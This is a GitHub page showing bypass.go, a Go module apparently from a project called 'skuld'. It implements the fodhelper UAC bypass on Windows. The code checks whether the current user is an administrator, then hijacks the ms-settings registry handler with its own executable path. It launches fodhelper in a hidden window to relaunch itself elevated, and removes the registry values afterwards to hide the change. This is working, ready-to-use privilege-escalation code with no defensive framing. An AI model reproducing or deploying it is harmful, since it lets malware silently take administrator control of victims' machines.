-
Notifications
You must be signed in to change notification settings - Fork 66
/
Copy pathbypass.go
96 lines (76 loc) · 1.6 KB
/
bypass.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
package uacbypass
import (
"github.com/hackirby/skuld/utils/program"
"os"
"os/exec"
"syscall"
"unsafe"
"golang.org/x/sys/windows/registry"
)
func CanElevate() bool {
var infoPointer uintptr
syscall.NewLazyDLL("netapi32.dll").NewProc("NetUserGetInfo").Call(
0,
uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(os.Getenv("USERNAME")))),
1,
uintptr(unsafe.Pointer(&infoPointer)),
)
defer syscall.NewLazyDLL("netapi32.dll").NewProc("NetApiBufferFree").Call(infoPointer)
type user struct {
Username *uint16
Password *uint16
PasswordAge uint32
Priv uint32
HomeDir *uint16
Comment *uint16
Flags uint32
ScriptPath *uint16
}
info := (*user)(unsafe.Pointer(infoPointer))
return info.Priv == 2
}
func Elevate() error {
k, _, err := registry.CreateKey(registry.CURRENT_USER,
"Software\\Classes\\ms-settings\\shell\\open\\command", registry.ALL_ACCESS)
if err != nil {
return err
}
defer k.Close()
value, err := os.Executable()
if err != nil {
return err
}
if err = k.SetStringValue("", value); err != nil {
return err
}
if err = k.SetStringValue("DelegateExecute", ""); err != nil {
return err
}
cmd := exec.Command("cmd.exe", "/C", "fodhelper")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
err = cmd.Run()
if err != nil {
return err
}
err = k.DeleteValue("")
if err != nil {
return err
}
err = k.DeleteValue("DelegateExecute")
if err != nil {
return err
}
return nil
}
func Run() {
if program.IsElevated() {
return
}
if !CanElevate() {
return
}
if err := Elevate(); err != nil {
return
}
os.Exit(0)
}